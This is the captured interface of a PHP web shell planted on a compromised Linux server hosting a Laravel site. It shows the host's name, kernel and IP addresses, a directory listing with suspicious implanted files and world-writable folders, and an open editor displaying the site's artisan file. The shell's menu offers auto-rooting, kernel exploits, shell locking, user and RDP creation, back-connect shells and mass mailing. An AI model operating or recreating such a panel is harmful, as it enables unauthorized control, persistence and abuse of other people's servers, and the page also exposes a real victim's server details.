Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.142
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo4.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
1esgjpx
[ DIR ]
drwxrwxrwx
app
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
cumnofv
[ DIR ]
drwxrwxrwx
documentation
[ DIR ]
drwxr-xr-x
fep1avo
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxr-xr-x
lara
[ DIR ]
drwxr-xr-x
lehyrug
[ DIR ]
drwxrwxrwx
obmjx1l
[ DIR ]
drwxrwxrwx
product-images
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
sumdgtj
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
witlpfy
[ DIR ]
drwxrwxrwx
wmrvpgj
[ DIR ]
drwxrwxrwx
.DS_Store
10
KB
-rw-r--r--
.editorconfig
235
B
-rw-r--r--
.env
894
B
-rw-r--r--
.env.example
915
B
-rw-r--r--
.gitattributes
116
B
-rw-r--r--
.gitignore
320
B
-rw-r--r--
.htaccess
1.96
KB
-r--r--r--
.styleci.yml
194
B
-rw-r--r--
artisan
1.7
KB
-rw-r--r--
cjfuns.php
2.43
KB
-rw-r--r--
composer.json
1.91
KB
-rw-r--r--
composer.lock
325.46
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
index.php
22.49
KB
-r--r--r--
license-bjai.php
629
B
-rw-r--r--
package.json
491
B
-rw-r--r--
phpunit.xml
1.2
KB
-rw-r--r--
readme.md
3.75
KB
-rw-r--r--
robots.txt
85
B
-rw-r--r--
server.php
584
B
-rw-r--r--
webpack.mix.js
576
B
-rw-r--r--
wp-blog-header.php
0
B
-rw-r--r--
wp-load.php
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : artisan
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any our classes "manually". Feels great to relax. | */ require __DIR__.'/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);
Close